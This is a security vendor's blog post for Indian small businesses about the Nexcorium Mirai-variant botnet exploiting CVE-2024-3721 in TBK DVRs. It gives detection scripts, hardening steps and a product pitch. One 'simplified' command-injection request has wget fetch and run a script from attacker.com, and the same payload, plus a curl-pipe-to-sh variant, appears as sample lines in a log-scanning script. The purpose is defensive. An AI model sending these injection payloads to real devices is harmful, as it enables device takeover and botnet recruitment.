What Happened
In April 2026, security researchers at Fortinet FortiGuard Labs and Palo Alto Networks Unit 42 uncovered a coordinated campaign exploiting CVE-2024-3721, a command injection vulnerability in TBK DVR devices. Threat actors deployed a Mirai botnet variant called Nexcorium across thousands of compromised devices, turning them into DDoS weapons targeting critical infrastructure and commercial services.
The attack wasn't limited to DVRs. Researchers also documented exploitation of end-of-life (EoL) TP-Link Wi-Fi routers—devices that no longer receive security patches from the manufacturer. These routers, commonly found in small offices and retail shops across India, became entry points for botnet deployment. Once infected, these devices silently participated in distributed denial-of-service (DDoS) attacks without the owner's knowledge.
What makes Nexcorium particularly dangerous is its ability to persist across device reboots and evade basic network monitoring. The botnet communicates with command-and-control (C2) servers using encrypted channels, making detection difficult for SMBs without advanced security infrastructure.
Why This Matters for Indian Businesses
This threat hits a critical blind spot: most small businesses treat network infrastructure as "set and forget." A DVR installed three years ago? Still running. A router from 2019? Still managing guest Wi-Fi. These devices are invisible until they become weapons.
Under India's Digital Personal Data Protection (DPDP) Act, organizations are responsible for securing data in transit and at rest. If your compromised DVR or router is used in a DDoS attack that damages a third party's systems, you could face liability. More critically, if that DDoS attack disrupts a financial institution or telecom provider, CERT-In's 6-hour incident reporting mandate kicks in—and you'll need to prove you took reasonable steps to prevent it.
The Reserve Bank of India (RBI) also requires financial institutions to audit third-party vendors and connected devices. If your business processes payments or handles customer data, a compromised router becomes a compliance violation.
Here's the real risk: Your business doesn't need to be the target. Your devices just need to be the weapon. Nexcorium doesn't steal data from the DVR—it uses the DVR's bandwidth and processing power to attack someone else. You're liable, your network is blacklisted, and your legitimate traffic gets filtered by ISPs trying to stop the DDoS.
Technical Breakdown
How the Attack Works
CVE-2024-3721 is a command injection vulnerability in TBK DVR's web interface. The vulnerability exists in how the device parses user input in the device configuration endpoint. An attacker doesn't need credentials—they can send a specially crafted HTTP request that executes arbitrary shell commands.
```mermaid
graph TD
A[Attacker Scans for Exposed TBK DVRs] -->|Port 80/8080| B[Sends Malicious HTTP Request]
B -->|CVE-2024-3721 Payload| C[Command Injection Executed]
C -->|Shell Access| D[Downloads Nexcorium Binary]
D -->|Persistence| E[Modifies Firmware/Cron Jobs]
E -->|Network Compromise| F[Device Joins DDoS Botnet]
F -->|Encrypted C2| G[Receives Attack Instructions]
G -->|Bandwidth Hijack| H[Launches DDoS on Target]
style A fill:#5f1e1e,stroke:#EF4444,color:#e2e8f0
style B fill:#5f1e1e,stroke:#EF4444,color:#e2e8f0
style C fill:#5f1e1e,stroke:#EF4444,color:#e2e8f0
style D fill:#5f1e1e,stroke:#EF4444,color:#e2e8f0
style E fill:#1e3a5f,stroke:#3B82F6,color:#e2e8f0
style F fill:#1e3a5f,stroke:#3B82F6,color:#e2e8f0
style G fill:#1e3a5f,stroke:#3B82F6,color:#e2e8f0
style H fill:#5f1e1e,stroke:#EF4444,color:#e2e8f0
```

Here's what the actual exploit payload looks like (simplified):
```http
GET /api/device/config?name=system;wget%20http://attacker.com/nexcorium.sh;sh%20nexcorium.sh HTTP/1.1
Host: 192.168.1.100:8080
Connection: close
```

The semicolon breaks out of the intended command, and the attacker's shell script downloads and executes the Nexcorium binary. The script typically:
- Disables firewall rules to hide network traffic
- Installs a rootkit to survive reboots
- Connects to C2 servers using hardcoded IP addresses and DNS names
- Begins DDoS operations immediately, joining a botnet pool
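One way to catch exploitation attempts like the request above in the DVR's (or a fronting reverse proxy's) HTTP access log, as an added example that is not code from the original post or from either vendor's research: it URL-decodes each query parameter and flags shell metacharacters and download-and-execute tokens. The log layout, the attacker.example host and the sample lines are constructed; it goes beyond the page's single payload by also catching percent-encoded and double-encoded metacharacters.

```python
import re
from urllib.parse import urlsplit, unquote_plus, unquote

# Constructed access-log excerpt (client IP, method, target, version); not real traffic.
SAMPLE_LOG = """\
203.0.113.7 GET /api/device/config?name=system HTTP/1.1
203.0.113.9 GET /api/device/config?name=system;wget%20http://attacker.example/nexcorium.sh;sh%20nexcorium.sh HTTP/1.1
198.51.100.4 GET /api/device/config?name=system%253Bcurl%2520http%3A%2F%2Fattacker.example%2Fx%7Csh HTTP/1.1
203.0.113.7 GET /index.html HTTP/1.1
198.51.100.8 GET /api/device/config?name=%24(id) HTTP/1.1
"""

VULNERABLE_PATH = "/api/device/config"          # endpoint named in the write-up
SHELL_META = re.compile(r"[;|&`\n]|\$\(")        # characters that end or chain a shell command
STAGER = re.compile(r"\b(wget|curl|tftp|busybox|sh)\b", re.IGNORECASE)

def query_params(query):
    """Split on '&' only (older parse_qsl also splits on ';', which would hide the payload)."""
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        # Decode twice so %253B (double-encoded ';') is caught as well as %3B
        yield unquote_plus(name), unquote(unquote_plus(value))

def analyse_request(line):
    """Return a finding dict for one access-log line, or None when it looks benign."""
    parts = line.split()
    if len(parts) < 3:
        return None
    client, target = parts[0], parts[2]
    url = urlsplit(target)
    for name, value in query_params(url.query):
        if SHELL_META.search(value):
            return {
                "client": client,
                "param": name,
                "decoded": value,
                # A hit on the known-vulnerable endpoint outranks a probe elsewhere
                "severity": "critical" if url.path == VULNERABLE_PATH else "medium",
                "stager": bool(STAGER.search(value)),   # download-and-execute chain present?
            }
    return None

def scan_log(text):
    return [f for f in map(analyse_request, text.splitlines()) if f]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```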
Why Detection is Hard
Nexcorium uses several evasion techniques:
- Encrypted C2 communication: Traffic doesn't match known DDoS patterns
- Polymorphic payload: The binary changes on each infection, evading signature-based detection
- Low-bandwidth attacks: Spreads DDoS load across thousands of devices to avoid triggering rate-limit alarms
- Process hiding: Uses kernel-level rootkits to hide from ps and netstat commands
How to Protect Your Business
Immediate Actions (This Week)
| Protection Layer | Action | Difficulty |
|---|---|---|
| Inventory | Document all DVRs, routers, and IoT devices with make, model, firmware version | Easy |
| Patch Check | Visit vendor support pages; identify devices with no available patches | Easy |
| Network Segmentation | Isolate DVRs and routers on a separate VLAN from critical systems | Medium |
| Firewall Rules | Block outbound connections from IoT devices to non-whitelisted IPs | Medium |
| Credential Audit | Change default admin passwords on all devices | Easy |
| Firmware Update | Apply latest patches to all devices still receiving updates | Easy |
Quick Fix: Check for Nexcorium Infection
Run this command on your network to identify suspicious outbound connections from your DVRs and routers:
```bash
# Check for unusual outbound connections from IoT devices
# arp-scan needs raw-socket access (hence sudo); it prints IP, MAC and vendor per host
sudo arp-scan -l | grep -i "TBK\|TP-Link" | awk '{print $1}' | while read -r ip; do
  echo "Scanning $ip for suspicious connections..."
  # -n keeps ssh from reading the loop's stdin and swallowing the remaining IPs;
  # assumes SSH is enabled on the device with an admin account
  ssh -n "admin@$ip" "netstat -an | grep ESTABLISHED | grep -v ':22\|:80\|:443'" 2>/dev/null
done
```

If you see connections to unfamiliar IP addresses (especially non-standard ports like 6379, 5555, or 9999), the device may be compromised.
For a more thorough check, monitor DNS queries:
```bash
# Capture DNS requests from your DVR subnet (adjust eth0 and the subnet to your network)
sudo tcpdump -i eth0 -n 'src net 192.168.1.0/24 and dst port 53' -w dvr_dns.pcap

# Extract unique domains
tshark -r dvr_dns.pcap -Y dns -T fields -e dns.qry.name | sort | uniq
```

If you see domains like c2.nexcorium.ru or similar, your device is likely compromised.
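To triage the output of the two checks above (the netstat listing from each device and the domain list from tshark) consistently, here is an added Python example that is not from the original post: it flags established sessions leaving the 192.168.1.0/24 subnet on ports outside an expected set, singles out the Mirai-variant C2 ports the FAQ lists, and reports queried domains outside an allowlist. The netstat excerpt, the DNS names and the vendor-cloud.example allowlist entry are constructed for the example; the BusyBox-style netstat column layout is assumed.

```python
import ipaddress

# Ports a DVR legitimately talks to (mirrors the ssh check above, which excludes 22/80/443).
EXPECTED_REMOTE_PORTS = {22, 53, 80, 123, 443}
# Ports the FAQ below lists as common Mirai-variant C2 ports.
KNOWN_C2_PORTS = {23, 5555, 6379, 9999}
# The DVR subnet used throughout the post; peers inside it are assumed to be your own hosts.
LAN = ipaddress.ip_network("192.168.1.0/24")
# Domains you have verified the device needs (constructed; vendor-cloud.example is a placeholder).
ALLOWED_DOMAIN_SUFFIXES = ("pool.ntp.org", "vendor-cloud.example")

# Constructed `netstat -an` output in the BusyBox layout most DVRs use; not from a real device.
SAMPLE_NETSTAT = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 192.168.1.100:80        192.168.1.20:51234      ESTABLISHED
tcp        0      0 192.168.1.100:43122     203.0.113.55:6379       ESTABLISHED
tcp        0      0 192.168.1.100:43123     198.51.100.9:443        ESTABLISHED
tcp        0      0 192.168.1.100:43124     198.51.100.77:8443      ESTABLISHED
tcp        0      0 0.0.0.0:8080            0.0.0.0:*               LISTEN
"""
# Constructed query names in the form `tshark -e dns.qry.name` prints them.
SAMPLE_DNS = ["0.pool.ntp.org", "c2.nexcorium.ru", "update.vendor-cloud.example", "0.pool.ntp.org"]

def suspicious_connections(netstat_text):
    """Return (remote_ip, remote_port, reason) for ESTABLISHED flows leaving the LAN on unexpected ports."""
    hits = []
    for line in netstat_text.splitlines():
        cols = line.split()
        if len(cols) < 6 or cols[5] != "ESTABLISHED":
            continue                                  # headers, LISTEN sockets, UDP lines
        host, _, port = cols[4].rpartition(":")
        if ipaddress.ip_address(host) in LAN:
            continue                                  # e.g. the office PC viewing the camera feed
        port = int(port)
        if port in KNOWN_C2_PORTS:
            hits.append((host, port, "known Mirai-variant C2 port"))
        elif port not in EXPECTED_REMOTE_PORTS:
            hits.append((host, port, "unexpected remote port"))
    return hits

def suspicious_domains(query_names):
    """Unique query names outside the allowlist; review each before blocking."""
    return sorted({n for n in query_names if not n.endswith(ALLOWED_DOMAIN_SUFFIXES)})
```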
Long-Term Hardening
- Disable Remote Management: Turn off port forwarding and remote access features on DVRs and routers. Access them only from your internal network.
- Implement Network Segmentation: Place all IoT devices on a restricted VLAN that can't communicate with your main business network.
- Deploy Intrusion Detection: Use open-source tools like Suricata or Zeek to detect botnet C2 communication patterns.
- Enable Device Logging: Configure syslog forwarding from all network devices to a central logging server. Monitor for suspicious login attempts and configuration changes.
- Establish Replacement Schedules: Retire devices after 4 years, even if they "still work." Security patches stop long before hardware fails.
How Bachao.AI Detects This
Bachao.AI by Dhisattva AI Pvt Ltd embeds enterprise-grade detection into an accessible VAPT platform for Indian SMBs — built around three principles: visibility, baseline behaviour, and anomaly response.
Our VAPT Scan includes:
- Network device enumeration and vulnerability mapping
- Identification of EoL devices and missing patches
- Botnet signature detection and C2 communication analysis
- Compliance gap assessment under DPDP Act and RBI guidelines
```text
Vulnerability Report Summary
─────────────────────────────
[CRITICAL] TBK DVR Model XYZ running firmware v2.1.4 (EoL)
→ CVE-2024-3721 (CVSS 6.3) - Command Injection
→ No patches available from vendor
→ Recommendation: Replace device or air-gap from network
[HIGH] TP-Link Router WR841N running firmware v1.8.2 (2019)
→ Multiple RCE vulnerabilities in CGI interface
→ Device is EoL; no vendor support
→ Recommendation: Immediate replacement
[MEDIUM] Port 8080 exposed on DVR to internet
→ Attacker can reach vulnerable web interface
→ Recommendation: Block port 8080 at firewall; use VPN for remote access
[MEDIUM] No network segmentation detected
→ DVR is on same subnet as accounting workstations
→ Lateral movement risk is high
→ Recommendation: Create IoT VLAN with restricted egress rules
```

Frequently Asked Questions
Q: How do I know if my DVR model is vulnerable to CVE-2024-3721?
CVE-2024-3721 affects TBK DVR devices running firmware versions prior to the patch released in late 2024. Check your firmware version via the device web interface under Settings → System → Firmware. If you cannot find a patch on the TBK support page, treat the device as vulnerable.
Q: Can I patch the vulnerability without replacing the device?
If TBK has released a firmware update for your model, apply it immediately. If the device is end-of-life with no available patch, network segmentation (isolating it to a restricted VLAN with outbound filtering) is the next best control until replacement.
Q: Does CERT-In need to be notified if my DVR is used in a DDoS attack?
Yes, under CERT-In's April 2022 directions, compromise of network infrastructure that results in a DDoS attack or data breach must be reported within 6 hours of discovery.
Q: What ports should I block to prevent Nexcorium C2 communication?
Common C2 ports observed in Mirai-variant campaigns include 6379, 5555, 9999, and 23. Block outbound connections from IoT VLANs to all non-whitelisted ports and IPs.
Q: We're a small retailer with one DVR for CCTV. Do these rules apply to us?
Yes. Size is irrelevant to CERT-In and DPDP Act obligations. If your device is compromised and used to attack a third party, you carry liability. A single VLAN separation and credential change takes under an hour.
Originally reported by The Hacker News
Written by Shouvik Mukherjee, Founder, Bachao.AI (Dhisattva AI Pvt Ltd). Follow on LinkedIn for daily cybersecurity insights for Indian businesses.